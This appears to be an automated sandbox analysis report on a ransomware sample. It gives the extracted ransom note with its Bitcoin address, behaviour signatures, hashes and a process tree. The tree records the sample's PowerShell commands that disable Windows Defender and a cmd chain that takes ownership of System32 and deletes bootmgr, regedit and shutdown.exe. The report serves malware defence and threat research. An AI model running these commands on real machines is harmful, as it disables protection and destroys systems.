Analysis

  • max time kernel
    1583s
  • max time network
    1601s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    27-10-2021 09:06

General

  • Target

    b53415f6_lcvDB3iF4J.exe

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\DECRYPT-FILES.TXT

Ransom Note
Ooops! All your important files are encrypted! [+] What happend to my computer? [+] All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $250. [+] How do i pay? [+] Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom. [+] How can i contact? [+] 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us ([email protected]) If you can't use tor in your country you can write to us on our temporary email address. [+] What if i already paid? [+] Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software. 3.Do not turn off your computer. Our bitcoin address: bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe Our temporary e-mail address: [email protected]
URLs

http://mail2tor2zyjdctd.onion/

Signatures

  • Maze

    Ransomware family also known as ChaCha.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Disables Task Manager via registry modification
  • Executes dropped EXE 1 IoCs
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Possible privilege escalation attempt 5 IoCs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 5 IoCs
  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe
    "C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"
    1⤵
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1776
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:524
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1924
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2024
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1804
    • C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
      "C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1444
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1532
        • C:\Windows\SysWOW64\takeown.exe
          takeown /f C:\Windows\System32
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1432
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Windows\System32 /grant Admin:F
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1932
        • C:\Windows\SysWOW64\takeown.exe
          takeown /f C:\Windows\System32\drivers
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:900
        • C:\Windows\SysWOW64\icacls.exe
          icacls C:\Windows\System32\drivers /grant Admin:F
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:936
        • C:\Windows\SysWOW64\takeown.exe
          takeown /f C:\Windows\System32\LogonUI.exe
          4⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:1864

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\VSSVC.exe

    MD5

    e4f24d91d8e7290ffd6afc8aa01c6d63

    SHA1

    b552c6af33cc5a62379028687924406cba8ff74d

    SHA256

    5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb

    SHA512

    ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    MD5

    575d30ed43c0ba69f1e023d1c71f3afa

    SHA1

    31f7fa26cb370a91563b01172096eb8aeb1ca366

    SHA256

    99ab5ce4174adcba55575251804f4a3c3f77916b44fff5c85d40c15b41696687

    SHA512

    594a2df43487a5f72781c2cd228c05e5209c9873ea83080ecceb72edafe6e24d55f5c85ebe52902c2e3a9a5049916bbb0467b5fd7a96e995ef0038bd83dc1a90

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    MD5

    575d30ed43c0ba69f1e023d1c71f3afa

    SHA1

    31f7fa26cb370a91563b01172096eb8aeb1ca366

    SHA256

    99ab5ce4174adcba55575251804f4a3c3f77916b44fff5c85d40c15b41696687

    SHA512

    594a2df43487a5f72781c2cd228c05e5209c9873ea83080ecceb72edafe6e24d55f5c85ebe52902c2e3a9a5049916bbb0467b5fd7a96e995ef0038bd83dc1a90

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    MD5

    575d30ed43c0ba69f1e023d1c71f3afa

    SHA1

    31f7fa26cb370a91563b01172096eb8aeb1ca366

    SHA256

    99ab5ce4174adcba55575251804f4a3c3f77916b44fff5c85d40c15b41696687

    SHA512

    594a2df43487a5f72781c2cd228c05e5209c9873ea83080ecceb72edafe6e24d55f5c85ebe52902c2e3a9a5049916bbb0467b5fd7a96e995ef0038bd83dc1a90

  • \Users\Admin\AppData\Local\Temp\VSSVC.exe

    MD5

    e4f24d91d8e7290ffd6afc8aa01c6d63

    SHA1

    b552c6af33cc5a62379028687924406cba8ff74d

    SHA256

    5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb

    SHA512

    ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00

  • memory/524-60-0x0000000000000000-mapping.dmp

  • memory/524-83-0x0000000002162000-0x0000000002164000-memory.dmp

    Filesize

    8KB

  • memory/524-82-0x0000000002161000-0x0000000002162000-memory.dmp

    Filesize

    4KB

  • memory/524-81-0x0000000002160000-0x0000000002161000-memory.dmp

    Filesize

    4KB

  • memory/900-94-0x0000000000000000-mapping.dmp

  • memory/936-95-0x0000000000000000-mapping.dmp

  • memory/1432-92-0x0000000000000000-mapping.dmp

  • memory/1444-69-0x0000000000000000-mapping.dmp

  • memory/1444-74-0x0000000000330000-0x0000000000331000-memory.dmp

    Filesize

    4KB

  • memory/1444-79-0x0000000005780000-0x0000000005781000-memory.dmp

    Filesize

    4KB

  • memory/1532-91-0x0000000000000000-mapping.dmp

  • memory/1776-59-0x0000000005AB0000-0x0000000005AB1000-memory.dmp

    Filesize

    4KB

  • memory/1776-54-0x0000000076A81000-0x0000000076A83000-memory.dmp

    Filesize

    8KB

  • memory/1776-57-0x00000000003D0000-0x00000000003D1000-memory.dmp

    Filesize

    4KB

  • memory/1804-62-0x0000000000000000-mapping.dmp

  • memory/1804-90-0x0000000002370000-0x0000000002FBA000-memory.dmp

    Filesize

    12.3MB

  • memory/1804-80-0x0000000002370000-0x0000000002FBA000-memory.dmp

    Filesize

    12.3MB

  • memory/1864-96-0x0000000000000000-mapping.dmp

  • memory/1924-85-0x0000000002280000-0x0000000002ECA000-memory.dmp

    Filesize

    12.3MB

  • memory/1924-88-0x0000000002280000-0x0000000002ECA000-memory.dmp

    Filesize

    12.3MB

  • memory/1924-89-0x0000000002280000-0x0000000002ECA000-memory.dmp

    Filesize

    12.3MB

  • memory/1924-61-0x0000000000000000-mapping.dmp

  • memory/1932-93-0x0000000000000000-mapping.dmp

  • memory/2024-64-0x0000000000000000-mapping.dmp

  • memory/2024-87-0x00000000024F0000-0x000000000313A000-memory.dmp

    Filesize

    12.3MB

  • memory/2024-86-0x00000000024F0000-0x000000000313A000-memory.dmp

    Filesize

    12.3MB

  • memory/2024-84-0x00000000024F0000-0x000000000313A000-memory.dmp

    Filesize

    12.3MB